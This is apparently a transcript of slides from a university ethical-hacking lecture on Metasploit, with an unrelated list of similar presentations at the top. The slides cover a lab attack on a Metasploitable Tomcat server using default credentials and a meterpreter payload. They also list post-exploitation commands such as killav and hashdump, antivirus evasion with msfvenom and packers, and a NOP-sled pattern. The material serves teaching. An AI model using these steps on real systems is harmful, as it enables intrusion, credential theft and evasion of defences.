MIS 5212.001 Week 2 Site:

Slides:



Advertisements
Similar presentations
HalFILE Remote Scanning Technologies. The problem…. I need to capture documents at a remote office and send them to a central office for storage in halFILE.
Advertisements

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Microsoft Security Resources. URL’s for this talk All URL’s mentioned in this talk can be found here: All URL’s mentioned in this talk can be found here:
Metasploit – Embedded PDF Exploit Presented by: Jesse Lucas.
Servlets and a little bit of Web Services Russell Beale.
Information Networking Security and Assurance Lab National Chung Cheng University F.I.R.E. Forensics & Incident Response Environment.
Assessing Vulnerabilities ISA 4220 Server Systems Security James A. Edge Jr., CISSP, CISM, CISA, CPTE, MCSE Sr. Security Analyst Cincinnati Bell Technology.
MIS Week 3 Site:
Browser Exploitation Framework (BeEF) Lab
2004, Jei F.I.R.E. Forensics & Incident Response Environment Information Networking Security and Assurance Lab National Chung Cheng University.
TCP/IP - Security Perspective Upper Layers CS-431 Dick Steflik.
Nikto LUCA ALEXANDRA ADELA. Nikto  Web server assessment tool  Written by Chris Solo and David Lodge  Released on December 27, 2001  Stable release:
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
Introduction to InfoSec – Recitation 15 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
MIS Week 5 Site:
FEATURES & FUNCTIONALITY. Page 2 Agenda Main topics Packet Filter Firewall Application Control Other features.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
Port Scanning 0x470~0x480 Presenter SangDuk Seo 1.
MIS Week 6 Site:
Forensic and Investigative Accounting Chapter 14 Internet Forensics Analysis: Profiling the Cybercriminal © 2005, CCH INCORPORATED 4025 W. Peterson Ave.
Electronic Mail. Client Software and Mail Hosts –Client PC has client software that communicates with user’s mail host –Mail hosts deliver.
CHAPTER 14 Viruses, Trojan Horses and Worms. INTRODUCTION Viruses, Trojan Horses and worm are malicious programs that can cause damage to information.
1 Chap 10 Virus. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on an ever increasing.
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
Virus Detection Mechanisms Final Year Project by Chaitanya kumar CH K.S. Karthik.
CHAPTER 10 Session Hijacking. INTRODUCTION The act of taking over a connection of some sort, for examples, network connection, a modem connection or other.
MIS Week 1 Site:
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Application Layer Khondaker Abdullah-Al-Mamun Lecturer, CSE Instructor, CNAP AUST.
MIS Week 6 Site:
Penetration Testing 101 (Boot-camp)
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
Module: Software Engineering of Web Applications Chapter 2: Technologies 1.
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
DEV395 No Touch Deployment for Windows Forms Jamie Cool Program Manager.NET Client Microsoft Corporation.
MIS Week 1 Site:
Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
MIS Week 5 Site:
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
MIS Week 9 Site:
Final Project: Advanced Security Blade IPS and DLP blades.
CIS 4930 / CIS 5930 Offensive Computer Security Spring 2014 I only edited it again.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Intro to Ethical Hacking
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Adversary playbook.
Advanced Penetration Testing
Network Exploitation Tool
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
Common Operating System Exploits
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
PHP / MySQL Introduction
Intro to Ethical Hacking
Week 5.
Web Application Penetration Testing ‘17
Cyber Operation and Penetration Testing Social Engineering Attack and Web-based Exploitation Cliff Zou University of Central Florida.
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Penetration Testing & Network Defense
SHELLSHOCK ATTACK.
Engineering Secure Software
Presentation transcript:

MIS Week 2 Site:

 Introduction  In the news  Meterpreter  Avoiding Detection  Client Side Attacks  Auxiliary Modules  Next Week 2MIS

 Submitted  surge-in-2014-mobile-malware-onslaught/d/d- id/ surge-in-2014-mobile-malware-onslaught/d/d- id/  data-breaches-in-first-half-2014-were-preventable/ data-breaches-in-first-half-2014-were-preventable/  gle-discloses-windows-bugs.aspx gle-discloses-windows-bugs.aspx  and-turn-break-browser-privacy-protections and-turn-break-browser-privacy-protections MIS

 Submitted  t-card-hacks- target_n_ html?utm_hp_ref=hackers t-card-hacks- target_n_ html?utm_hp_ref=hackers  content/us/pdfs/security-intelligence/reports/rpt- the-invisible-becomes-visible.pdf content/us/pdfs/security-intelligence/reports/rpt- the-invisible-becomes-visible.pdf MIS

 What I noted MIS

 Meterpreter is an extension to the Metasploit Framework that leverages Metasploit functionality to extend the ability to exploit a victim system.  Meterpreter provides for the facility to migrate to different processes once a system has be compromised. MIS

 Most examples for meterpreter are shown in Windows. This is because Windows is easier for meterpreter to deal with.  The goal of meterpreter is to remain entirely in memory. That is, no foot print on the hard drive to make detection more difficult  Windows facilitates this through built in APIs that are not present in Linux  We will work through a Linux example do to licensing and availability of metasploitable. MIS

 After getting the database to work last week, it failed again during testing for this week.  EventuallyKirk built a new version of Metasploit framework and nmap in a fresh version of Ubuntu  URL for direction:  metasploit-in-ubunt/ metasploit-in-ubunt/  This will work, but step “bundle insrall” will require sudo and running nmap or Metasploit-framework will also require sudo MIS

 We will use nmap, Metasploit framework, and metasploitable  We will launch both Kali and Metasploitable  In this example  Metasploit =  Metasploitable= MIS

 Basic scan with nmap  Looking through scan we see MIS

 Looking through scan we also see MIS

 Now, start building exploit MIS

MIS

 We can see tomcat is up and running!  Googling shows default ID/Password is tomcat/tomcat MIS

 Now, start building exploit MIS

MIS

MIS

 Information I found on forums suggested the payload “java/meterpreter/reverse_tcp” should work. Tried numerous time without success.  Decided to “play around”. Tried PAYLOAD “bind_tcp”  Results on next pages MIS

MIS

 I’m in! MIS

 Grab some info:  And now we can background the process and do it again MIS

 Allows attacker to “pivot” through a compromised machine and either attack other processes on the host machine, or attack another machine on the victim network MIS

 Once you get to that meterpreter prompt  More options open up MIS

 Migrate to another process  Run post/windows/manage/migrate  Kill Antivirus Software  Run killav  Dump System Password hash  Run hashdump  View All Traffic  Run packetrecorder –I 1 Note: Not all actions work with all payloads MIS

 You don’t want to be caught by Antivirus software  Most AV systems are signature based  Signature must be specific enough to trigger only when they bump in to truly malicious software  Therefore, we can create unique payloads that have not been seen before MIS

 The Metasploit-framework came with two tools to help with this  Msfencode  Msfpayload  Both of these are now deprecated and will be removed on or about June of 2015  Msfvenom is the replacement  All three are currently part of the framework MIS

 Here’s a snippet  So many options needed to pipe to more to show beginning of the list MIS

 What are our options MIS

MIS

 MSFconsole is still up in another terminal  Not that options I had selected in that session are still active in the payloads MIS

 Since venom is the future MIS

 Example  Result MIS

 Packers  Packers are tools that compress an executable and combine it with decompression code to expand it upon execution.  Resultant code will not match the signature of the original  Popular packer is UPX  You can get it by running this MIS

 We talked a bit about this last semester  These include:  Browser based attacks  PDF readers  MS Office Files  Flash Files  Etc….  We’re just going to briefly talk about some browser attacks here. MIS

 First a little background  In coding there is something called a “no operation”, that is, it does nothing, has no impact, just takes up space.  In hex /x90/  Theses are called NOPs, string them together and you build something called a NOP sled  Put a little shellcode at the end and you have an attack MIS

 Browsers use a “heap” to store operations that need to be executed.  Maybe you have heard the phrase “Heap Spray” or “Heap Spraying”  This refers to throughing enough data at a heap to overwhelm it and get I machine to execute the code you want  Combine this with the NOP Sled and you have a mechanism to inject code via a browser MIS

 /x90/x90/x90/x90/x90/x90/x90/x90/x90/x9 0/x90/x90/x90/x90/x90/x90/x90/x90/x90/x 90/x90/x90/x90/x90/x90/x90/x90/x90/x90/ x90/x90/x90/x90/x90/x90/x90/x90/x90/x90 /x90/x90/x90/x90/x90/x90/x90/x90/x90/x9 0/x90/x90/x90/x90/x90/x90/x90/x90/x90/x 90/x90/x90/x90/x90/x90/[Shellcode Here] MIS

 Payload, Encode, and Venom have the ability to combine NOP sled with shell code in a payload that can be attached to a link for a browser, or in a PDF or other document.  That is as far as we are going with this. Just know that the tools have this capability MIS

 Metasploit-Framework Auxiliary Modules are modules that are modules that perform functions other then exploits  Broke down in to three main areas  Admin  Scanner  Server MIS

 Auxiliary Admin Modules break down into these areas:  Admin HTTP Modules (tomcat)  Admin MSSQL Modules  Admin MySQL Modules  Admin Postgres Modules  Admin VMWare Modules MIS

 Auxiliary Admin Modules break down into these areas: MIS DCERPC Discovery FTP HTTP IMAP MSSQL MySQL NetBIOS POP3 SMB SMTP SNMP SSH Telnet TFTP VMWare VNC

 Auxiliary Admin Modules break down into these areas:  ftp  http_ntlm  imap  pop3  smb MIS

 Social Engineering Toolkit  SQL Injection  Karmetasploit  Building Modules in Metasploit  Creating Exploits MIS

? MIS